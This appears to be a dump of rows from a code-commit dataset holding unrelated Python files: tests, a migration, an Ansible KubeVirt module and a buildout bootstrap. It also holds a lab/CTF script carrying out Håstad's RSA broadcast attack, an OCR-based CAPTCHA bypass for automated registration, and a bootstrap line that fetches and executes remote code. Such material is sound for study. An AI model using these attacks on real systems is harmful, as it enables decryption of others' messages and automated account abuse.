request = urllib2.Request(REGISTER_URL, encoded_data)
response = opener.open(request)
success = '/user/register' not in response.geturl()
return success
def test_samples():
"""测试精度的OCR图像样本
"""
correct = total = 0
for filename, text in csv.reader(open('samples/samples.csv')):
img = Image.open('samples/' + filename)
if ocr(img) == text:
correct += 1
total += 1
print 'Accuracy: %d/%d' % (correct, total)
if __name__ == '__main__':
print register(first_name='Test', last_name='Test', email='Test@webscraping.com', password='Test', captcha_fn=ocr)
| Python | 0.000002 | |
fe186bf85472cf4e683d9838e36e60c680e6dc77 | Add test | python/ql/test/library-tests/PointsTo/new/code/w_function_values.py | python/ql/test/library-tests/PointsTo/new/code/w_function_values.py | def test_conditoinal_function(cond):
def foo():
return "foo"
def bar():
return "bar"
if cond:
f = foo
else:
f = bar
sink = f()
return sink
f_false = test_conditoinal_function(False)
f_true = test_conditoinal_function(True)
def foo():
return "foo"
def test_redefinition():
f = foo
def foo():
return "refined"
sink = f()
return sink | Python | 0.000319 | |
1afb7bb7b1f3e8ef3070f1100dac683b2b8254ee | remove unused table | xbrowse_server/base/migrations/0003_delete_xhmmfile.py | xbrowse_server/base/migrations/0003_delete_xhmmfile.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('base', '0002_auto_20160117_1843'),
]
operations = [
migrations.DeleteModel(
name='XHMMFile',
),
]
| Python | 0.000013 | |
49c673c5c8374867fc9bf026717fe137bdba84bc | Add test file for graph.py and add test of Greengraph class constructor | greengraph/test/test_graph.py | greengraph/test/test_graph.py | from greengraph.map import Map
from greengraph.graph import Greengraph
from mock import patch
import geopy
from nose.tools import assert_equal
start = "London"
end = "Durham"
def test_Greengraph_init():
with patch.object(geopy.geocoders,'GoogleV3') as mock_GoogleV3:
test_Greengraph = Greengraph(start,end)
#Test that GoogleV3 is called with the correct parameters
mock_GoogleV3.assert_called_with(domain="maps.google.co.uk")
#Test that the start and end fields are initialised correctly
assert_equal(test_Greengraph.start,start)
assert_equal(test_Greengraph.end,end)
| Python | 0 | |
54553efa024d74ec60647ea7616191a52fe9948f | Add a command to create collaborator organisations | akvo/rsr/management/commands/create_collaborator_organisation.py | akvo/rsr/management/commands/create_collaborator_organisation.py | # -*- coding: utf-8 -*-
# Akvo Reporting is covered by the GNU Affero General Public License.
# See more details in the license.txt file located at the root folder of the Akvo RSR module.
# For additional details on the GNU license please see < http://www.gnu.org/licenses/agpl.html >.
"""Create a collaborator organisation for a given organisation.
Usage:
python manage.py create_collaborator_organisation <org-id>
"""
import sys
from django.core.management.base import BaseCommand
from akvo.rsr.models import Organisation
class Command(BaseCommand):
help = __doc__
def add_arguments(self, parser):
parser.add_argument('org_id', type=int)
def handle(self, *args, **options):
org_id = options['org_id']
try:
organisation = Organisation.objects.get(id=org_id)
except Organisation.DoesNotExist:
sys.exit('Could not find organisation with ID: {}'.format(org_id))
collaborator, _ = Organisation.objects.get_or_create(
content_owner=organisation,
original=organisation,
defaults=dict(
name='Collaborator: {}'.format(organisation.name),
long_name='Collaborator: {}'.format(organisation.long_name),
)
)
print('Collaborator Organisation created with ID: {}'.format(collaborator.id))
| Python | 0 | |
6318c1dd7d3c942bc7702402eb6ae50a86c023b7 | add hastad | lab3/hastad/code.py | lab3/hastad/code.py | # https://id0-rsa.pub/problem/11/
import gmpy2
def crt(a, n):
"""Chinese remainder theorem
from: http://rosettacode.org/wiki/Chinese_remainder_theorem#Python
x = a[0] % n[0]
x = a[1] % n[1]
x = a[2] % n[2]
Args:
a(list): remainders
n(list): modules
Returns:
long: solution to crt
"""
if len(a) != len(n):
log.critical_error("Different number of remainders({}) and modules({})".format(len(a), len(n)))
sum = 0
prod = reduce(lambda x, y: x * y, n)
for n_i, a_i in zip(n, a):
p = prod / n_i
sum += a_i * gmpy2.invert(p, n_i) * p
return long(sum % prod)
e = 3
C1 = 0x94f145679ee247b023b09f917beea7e38707452c5f4dc443bba4d089a18ec42de6e32806cc967e09a28ea6fd2e683d5bb7258bce9e6f972d6a30d7e5acbfba0a85610261fb3e0aac33a9e833234a11895402bc828da3c74ea2979eb833cd644b8ab9e3b1e46515f47a49ee602c608812241e56b94bcf76cfbb13532d9f4ff8ba
N1 = 0xa5d1c341e4837bf7f2317024f4436fb25a450ddabd7293a0897ebecc24e443efc47672a6ece7f9cac05661182f3abbb0272444ce650a819b477fd72bf01210d7e1fbb7eb526ce77372f1aa6c9ce570066deee1ea95ddd22533cbc68b3ba20ec737b002dfc6f33dcb19e6f9b312caa59c81bb80cda1facf16536cb3c184abd1d5
C2 = 0x5ad248df283350558ba4dc22e5ec8325364b3e0b530b143f59e40c9c2e505217c3b60a0fae366845383adb3efe37da1b9ae37851811c4006599d3c1c852edd4d66e4984d114f4ea89d8b2aef45cc531cfa1ab16c7a2e04d8884a071fed79a8d30af66edf1bbbf695ff8670b9fccf83860a06e017d67b1788b19b72d597d7d8d8
N2 = 0xaf4ed50f72b0b1eec2cde78275bcb8ff59deeeb5103ccbe5aaef18b4ddc5d353fc6dc990d8b94b3d0c1750030e48a61edd4e31122a670e5e942ae224ecd7b5af7c13b6b3ff8bcc41591cbf2d8223d32eeb46ba0d7e6d9ab52a728be56cd284842337db037e1a1da246ed1da0fd9bdb423bbe302e813f3c9b3f9414b25e28bda5
C3 = 0x8a9315ee3438a879f8af97f45df528de7a43cd9cf4b9516f5a9104e5f1c7c2cdbf754b1fa0702b3af7cecfd69a425f0676c8c1f750f32b736c6498cac207aa9d844c50e654ceaced2e0175e9cfcc2b9f975e3183437db73111a4a139d48cc6ce4c6fac4bf93b98787ed8a476a9eb4db4fd190c3d8bf4d5c4f66102c6dd36b73
N3 = 0x5ca9a30effc85f47f5889d74fd35e16705c5d1a767004fec7fdf429a205f01fd7ad876c0128ddc52caebaa0842a89996379ac286bc96ebbb71a0f8c3db212a18839f7877ebd76c3c7d8e86bf6ddb17c9c93a28defb8c58983e11304d483fd7caa19b4b261fc40a19380abae30f8d274481a432c8de488d0ea7b680ad6cf7776b
n_all = [N1, N2, N3]
ciphertext_all = [C1, C2, C3]
c_e = crt(ciphertext_all, n_all)
c = gmpy2.iroot(c_e, e)
print c
c = long(c[0])
print hex(c)[2:].strip('L').decode('hex')
| Python | 0.000212 | |
0fce5f54490d9ae9014280a5e0e96fd53128d299 | Add kubevirt_preset module (#52498) | lib/ansible/modules/cloud/kubevirt/kubevirt_preset.py | lib/ansible/modules/cloud/kubevirt/kubevirt_preset.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: kubevirt_preset
short_description: Manage KubeVirt virtual machine presets
description:
- Use Openshift Python SDK to manage the state of KubeVirt virtual machine presets.
version_added: "2.8"
author: KubeVirt Team (@kubevirt)
options:
state:
description:
- Create or delete virtual machine presets.
default: "present"
choices:
- present
- absent
type: str
name:
description:
- Name of the virtual machine preset.
required: true
type: str
namespace:
description:
- Namespace where the virtual machine preset exists.
required: true
type: str
selector:
description:
- "Selector is a label query over a set of virtual machine preset."
type: dict
extends_documentation_fragment:
- k8s_auth_options
- k8s_resource_options
- kubevirt_vm_options
- kubevirt_common_options
requirements:
- python >= 2.7
- openshift >= 0.8.2
'''
EXAMPLES = '''
- name: Create virtual machine preset 'vmi-preset-small'
kubevirt_preset:
state: present
name: vmi-preset-small
namespace: vms
memory: 64M
selector:
matchLabels:
kubevirt.io/vmPreset: vmi-preset-small
- name: Remove virtual machine preset 'vmi-preset-small'
kubevirt_preset:
state: absent
name: vmi-preset-small
namespace: vms
'''
RETURN = '''
kubevirt_preset:
description:
- The virtual machine preset managed by the user.
- "This dictionary contains all values returned by the KubeVirt API all options
are described here U(https://kubevirt.io/api-reference/master/definitions.html#_v1_virtualmachineinstancepreset)"
returned: success
type: complex
contains: {}
'''
import copy
import traceback
from ansible.module_utils.k8s.common import AUTH_ARG_SPEC, COMMON_ARG_SPEC
from ansible.module_utils.kubevirt import (
virtdict,
KubeVirtRawModule,
VM_COMMON_ARG_SPEC
)
KIND = 'VirtualMachineInstancePreset'
VMP_ARG_SPEC = {
'selector': {'type': 'dict'},
}
class KubeVirtVMPreset(KubeVirtRawModule):
@property
def argspec(self):
""" argspec property builder """
argument_spec = copy.deepcopy(COMMON_ARG_SPEC)
argument_spec.update(copy.deepcopy(AUTH_ARG_SPEC))
argument_spec.update(VM_COMMON_ARG_SPEC)
argument_spec.update(VMP_ARG_SPEC)
return argument_spec
def execute_module(self):
# Parse parameters specific for this module:
definition = virtdict()
selector = self.params.get('selector')
if selector:
definition['spec']['selector'] = selector
# FIXME: Devices must be set, but we don't yet support any
# attributes there, remove when we do:
definition['spec']['domain']['devices'] = dict()
# Execute the CURD of VM:
dummy, definition = self.construct_vm_definition(KIND, definition, definition)
result_crud = self.execute_crud(KIND, definition)
changed = result_crud['changed']
result = result_crud.pop('result')
# Return from the module:
self.exit_json(**{
'changed': changed,
'kubevirt_preset': result,
'result': result_crud,
})
def main():
module = KubeVirtVMPreset()
try:
module.execute_module()
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
| Python | 0 | |
a3d837afe6662edb10395baa8851de551d0915a5 | add email templates tests | auth0/v3/test/management/test_email_endpoints.py | auth0/v3/test/management/test_email_endpoints.py | import unittest
import mock
from ...management.email_templates import EmailTemplates
class TestClients(unittest.TestCase):
@mock.patch('auth0.v3.management.email_templates.RestClient')
def test_create(self, mock_rc):
mock_instance = mock_rc.return_value
c = EmailTemplates(domain='domain', token='jwttoken')
c.create({'a': 'b', 'c': 'd'})
mock_instance.post.assert_called_with(
'https://domain/api/v2/email-templates',
data={'a': 'b', 'c': 'd'}
)
@mock.patch('auth0.v3.management.email_templates.RestClient')
def test_get(self, mock_rc):
mock_instance = mock_rc.return_value
c = EmailTemplates(domain='domain', token='jwttoken')
c.get('this-template-name')
mock_instance.get.assert_called_with(
'https://domain/api/v2/email-templates/this-template-name'
)
@mock.patch('auth0.v3.management.email_templates.RestClient')
def test_update(self, mock_rc):
mock_instance = mock_rc.return_value
c = EmailTemplates(domain='domain', token='jwttoken')
c.update('this-template-name', {'a': 'b', 'c': 'd'})
mock_instance.patch.assert_called_with(
'https://domain/api/v2/email-templates/this-template-name',
data={'a': 'b', 'c': 'd'}
)
| Python | 0.000001 | |
39b939551e5530fd1c776dffdc016b715dc6819a | Add bootstrap | bootstrap.py | bootstrap.py | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
"""
import os
import shutil
import sys
import tempfile
from optparse import OptionParser
__version__ = '2015-07-01'
# See zc.buildout's changelog if this version is up to date.
tmpeggs = tempfile.mkdtemp(prefix='bootstrap-')
usage = '''\
[DESIRED PYTHON FOR BUILDOUT] bootstrap.py [options]
Bootstraps a buildout-based project.
Simply run this script in a directory containing a buildout.cfg, using the
Python that you want bin/buildout to use.
Note that by using --find-links to point to local resources, you can keep
this script from going over the network.
'''
parser = OptionParser(usage=usage)
parser.add_option("--version",
action="store_true", default=False,
help=("Return bootstrap.py version."))
parser.add_option("-t", "--accept-buildout-test-releases",
dest='accept_buildout_test_releases',
action="store_true", default=False,
help=("Normally, if you do not specify a --version, the "
"bootstrap script and buildout gets the newest "
"*final* versions of zc.buildout and its recipes and "
"extensions for you. If you use this flag, "
"bootstrap and buildout will get the newest releases "
"even if they are alphas or betas."))
parser.add_option("-c", "--config-file",
help=("Specify the path to the buildout configuration "
"file to be used."))
parser.add_option("-f", "--find-links",
help=("Specify a URL to search for buildout releases"))
parser.add_option("--allow-site-packages",
action="store_true", default=False,
help=("Let bootstrap.py use existing site packages"))
parser.add_option("--buildout-version",
help="Use a specific zc.buildout version")
parser.add_option("--setuptools-version",
help="Use a specific setuptools version")
parser.add_option("--setuptools-to-dir",
help=("Allow for re-use of existing directory of "
"setuptools versions"))
options, args = parser.parse_args()
if options.version:
print("bootstrap.py version %s" % __version__)
sys.exit(0)
######################################################################
# load/install setuptools
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
ez = {}
if os.path.exists('ez_setup.py'):
exec(open('ez_setup.py').read(), ez)
else:
exec(urlopen('https://bootstrap.pypa.io/ez_setup.py').read(), ez)
if not options.allow_site_packages:
# ez_setup imports site, which adds site packages
# this will remove them from the path to ensure that incompatible versions
# of setuptools are not in the path
import site
# inside a virtualenv, there is no 'getsitepackages'.
# We can't remove these reliably
if hasattr(site, 'getsitepackages'):
for sitepackage_path in site.getsitepackages():
# Strip all site-packages directories from sys.path that
# are not sys.prefix; this is because on Windows
# sys.prefix is a site-package directory.
if sitepackage_path != sys.prefix:
sys.path[:] = [x for x in sys.path
if sitepackage_path not in x]
setup_args = dict(to_dir=tmpeggs, download_delay=0)
if options.setuptools_version is not None:
setup_args['version'] = options.setuptools_version
if options.setuptools_to_dir is not None:
setup_args['to_dir'] = options.setuptools_to_dir
ez['use_setuptools'](**setup_args)
import setuptools
import pkg_resources
# This does not (always?) update the default working set. We will
# do it.
for path in sys.path:
if path not in pkg_resources.working_set.entries:
pkg_resources.working_set.add_entry(path)
######################################################################
# Install buildout
ws = pkg_resources.working_set
setuptools_path = ws.find(
pkg_resources.Requirement.parse('setuptools')).location
# Fix sys.path here as easy_install.pth added before PYTHONPATH
cmd = [sys.executable, '-c',
'import sys; sys.path[0:0] = [%r]; ' % setuptools_path +
'from setuptools.command.easy_install import main; main()',
'-mZqNxd', tmpeggs]
find_links = os.environ.get(
'bootstrap-testing-find-links',
options.find_links or
('http://downloads.buildout.org/'
if options.accept_buildout_test_releases else None)
)
if find_links:
cmd.extend(['-f', find_links])
requirement = 'zc.buildout'
version = options.buildout_version
if version is None and not options.accept_buildout_test_releases:
# Figure out the most recent final version of zc.buildout.
import setuptools.package_index
_final_parts = '*final-', '*final'
def _final_version(parsed_version):
try:
return not parsed_version.is_prerelease
except AttributeError:
# Older setuptools
for part in parsed_version:
if (part[:1] == '*') and (part not in _final_parts):
return False
return True
index = setuptools.package_index.PackageIndex(
search_path=[setuptools_path])
if find_links:
index.add_find_links((find_links,))
req = pkg_resources.Requirement.parse(requirement)
if index.obtain(req) is not None:
best = []
bestv = None
for dist in index[req.project_name]:
distv = dist.parsed_version
if _final_version(distv):
if bestv is None or distv > bestv:
best = [dist]
bestv = distv
elif distv == bestv:
best.append(dist)
if best:
best.sort()
version = best[-1].version
if version:
requirement = '=='.join((requirement, version))
cmd.append(requirement)
import subprocess
if subprocess.call(cmd) != 0:
raise Exception(
"Failed to execute command:\n%s" % repr(cmd)[1:-1])
######################################################################
# Import and run buildout
ws.add_entry(tmpeggs)
ws.require(requirement)
import zc.buildout.buildout
if not [a for a in args if '=' not in a]:
args.append('bootstrap')
# if -c was provided, we push it back into args for buildout' main function
if options.config_file is not None:
args[0:0] = ['-c', options.config_file]
zc.buildout.buildout.main(args)
shutil.rmtree(tmpeggs)
| Python | 0.000003 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.